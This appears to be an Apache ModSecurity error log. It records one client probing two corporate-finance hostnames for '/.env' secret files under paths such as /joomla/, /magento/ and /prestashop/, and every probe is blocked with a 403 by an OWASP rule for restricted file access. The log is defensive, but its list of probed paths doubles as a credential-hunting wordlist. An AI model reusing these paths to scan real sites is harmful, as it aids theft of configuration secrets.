[Mon May 11 16:25:58.333213 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cms/.env"] [unique_id "agHm9jJnyuKVXoStDha0ewAAAFc"]
[Mon May 11 16:25:58.333439 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cms/.env"] [unique_id "agHm9jJnyuKVXoStDha0ewAAAFc"]
[Mon May 11 16:25:58.333944 2026] [core:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:58.334118 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cms/.env"] [unique_id "agHm9jJnyuKVXoStDha0ewAAAFc"]
[Mon May 11 16:25:58.681359 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:57798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/joomla/.env"] [unique_id "agHm9vy_GXSWIKeli0vyJgAAAJI"]
[Mon May 11 16:25:58.681534 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:57798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/joomla/.env"] [unique_id "agHm9vy_GXSWIKeli0vyJgAAAJI"]
[Mon May 11 16:25:58.682029 2026] [core:error] [pid 1411201:tid 1411264] [client 18.180.54.2:57798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:58.682206 2026] [security2:error] [pid 1411201:tid 1411264] [client 18.180.54.2:57798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/joomla/.env"] [unique_id "agHm9vy_GXSWIKeli0vyJgAAAJI"]
[Mon May 11 16:25:59.049480 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:57800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/drupal/.env"] [unique_id "agHm9zJnyuKVXoStDha0fAAAAFI"]
[Mon May 11 16:25:59.049702 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:57800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/drupal/.env"] [unique_id "agHm9zJnyuKVXoStDha0fAAAAFI"]
[Mon May 11 16:25:59.050361 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:57800] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:59.050558 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:57800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/drupal/.env"] [unique_id "agHm9zJnyuKVXoStDha0fAAAAFI"]
[Mon May 11 16:25:59.404087 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:57810] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/magento/.env"] [unique_id "agHm9w-Qm4vhlWBPlMi55AAAAAQ"]
[Mon May 11 16:25:59.404346 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:57810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/magento/.env"] [unique_id "agHm9w-Qm4vhlWBPlMi55AAAAAQ"]
[Mon May 11 16:25:59.404900 2026] [core:error] [pid 1411099:tid 1411105] [client 18.180.54.2:57810] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:59.405756 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:57810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/magento/.env"] [unique_id "agHm9w-Qm4vhlWBPlMi55AAAAAQ"]
[Mon May 11 16:25:59.823368 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:57820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/joomla/.env"] [unique_id "agHm9zJnyuKVXoStDha0fgAAAEA"]
[Mon May 11 16:25:59.823565 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:57820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/joomla/.env"] [unique_id "agHm9zJnyuKVXoStDha0fgAAAEA"]
[Mon May 11 16:25:59.824082 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:57820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:59.824252 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:57820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/joomla/.env"] [unique_id "agHm9zJnyuKVXoStDha0fgAAAEA"]
[Mon May 11 16:26:00.148665 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:57836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/shopify/.env"] [unique_id "agHm-Py_GXSWIKeli0vyKAAAAJM"]
[Mon May 11 16:26:00.148888 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:57836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/shopify/.env"] [unique_id "agHm-Py_GXSWIKeli0vyKAAAAJM"]
[Mon May 11 16:26:00.149485 2026] [core:error] [pid 1411201:tid 1411424] [client 18.180.54.2:57836] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:00.149647 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:57836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/shopify/.env"] [unique_id "agHm-Py_GXSWIKeli0vyKAAAAJM"]
[Mon May 11 16:26:00.570351 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57840] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/magento/.env"] [unique_id "agHm-DJnyuKVXoStDha0fwAAAEs"]
[Mon May 11 16:26:00.570582 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/magento/.env"] [unique_id "agHm-DJnyuKVXoStDha0fwAAAEs"]
[Mon May 11 16:26:00.571051 2026] [core:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:00.571213 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:57840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/magento/.env"] [unique_id "agHm-DJnyuKVXoStDha0fwAAAEs"]
[Mon May 11 16:26:00.889957 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:57848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/prestashop/.env"] [unique_id "agHm-A-Qm4vhlWBPlMi55wAAAAs"]
[Mon May 11 16:26:00.890206 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:57848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/prestashop/.env"] [unique_id "agHm-A-Qm4vhlWBPlMi55wAAAAs"]
[Mon May 11 16:26:00.890736 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:57848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:00.890889 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:57848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/prestashop/.env"] [unique_id "agHm-A-Qm4vhlWBPlMi55wAAAAs"]
[Mon May 11 16:26:01.275137 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:57860] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shopify/.env"] [unique_id "agHm-TJnyuKVXoStDha0gAAAAFU"]
[Mon May 11 16:26:01.275382 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:57860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shopify/.env"] [unique_id "agHm-TJnyuKVXoStDha0gAAAAFU"]
[Mon May 11 16:26:01.275867 2026] [core:error] [pid 1412074:tid 1412097] [client 18.180.54.2:57860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:01.276035 2026] [security2:error] [pid 1412074:tid 1412097] [client 18.180.54.2:57860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shopify/.env"] [unique_id "agHm-TJnyuKVXoStDha0gAAAAFU"]
[Mon May 11 16:26:01.594434 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:57876] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-UWKUxpmnkK7zHx7zgAAARg"]
[Mon May 11 16:26:01.594626 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:57876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-UWKUxpmnkK7zHx7zgAAARg"]
[Mon May 11 16:26:01.595089 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:57876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:01.595265 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:57876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-UWKUxpmnkK7zHx7zgAAARg"]
[Mon May 11 16:26:02.001736 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prestashop/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUHwAAAMw"]
[Mon May 11 16:26:02.001971 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prestashop/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUHwAAAMw"]
[Mon May 11 16:26:02.002502 2026] [core:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:02.002667 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:57886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/prestashop/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUHwAAAMw"]
[Mon May 11 16:26:02.277118 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:57900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cakephp/.env"] [unique_id "agHm-kWKUxpmnkK7zHx7zwAAAQo"]
[Mon May 11 16:26:02.277367 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:57900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cakephp/.env"] [unique_id "agHm-kWKUxpmnkK7zHx7zwAAAQo"]
[Mon May 11 16:26:02.277948 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:57900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
